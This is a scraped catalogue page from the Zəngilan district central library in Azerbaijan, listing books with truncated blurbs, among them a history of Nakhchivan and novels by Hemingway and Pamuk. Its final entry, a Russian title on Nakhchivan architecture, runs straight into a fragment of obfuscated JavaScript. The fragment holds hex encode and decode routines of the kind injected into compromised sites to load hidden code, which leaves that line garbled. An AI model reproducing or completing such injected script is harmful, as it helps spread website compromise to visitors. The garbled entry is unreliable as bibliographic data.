Zəngilan rayon Mərkəzi kitabxanası

Zəngilan rayon MKS

Naxçıvan diyarının siyasi tarixi

Kitabda Naxçıvan xanlığı ərazisinin dəyişməsinə təsir edən siyasi hadisələr, xanlığın təşəkkül tarixi açıqlanır. Diyarın əhalisi, kənd təsərrüfatı, sənətkarlığın vəziyyəti baxımından, eləcə də

Zərifə Əziz qızı Əliyeva : biblioqrafiya

Görkəmli oftolmoloq həkim Zərifə xanım Əliyevanın həyat fəaliyyəti ilə əlaqədar materialların biblioqrafiyası  kitabda  3 dildə verilmişdir...

Ernest Heminquey. Əzəl zəngi

XX əsr dünya ədəbiyyatında xüsusi yeri olan məşhur Amerika yazıçısı, Nobel mükafatı laureatı Ernest Heminqueyin (1899-1961) müharibə mövzusunda qələmə aldığı «Əcəl zəngi» romanı t

Orxan Pamuk. Mənim adım qırmızıdır

Nəqqaşın öz üslubu, rəngi, səsi olmalıdırmı? Padşahın əmriylə gizli kitab hazırlayan nəqqaşlardan biri öldürüləndə qatili üslubuna görə tapmaq olarmı? Məşhur türk yazıçısı, 2006-cı il

Салаева, Роза. Нахчыван наследие архитектуры // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));retu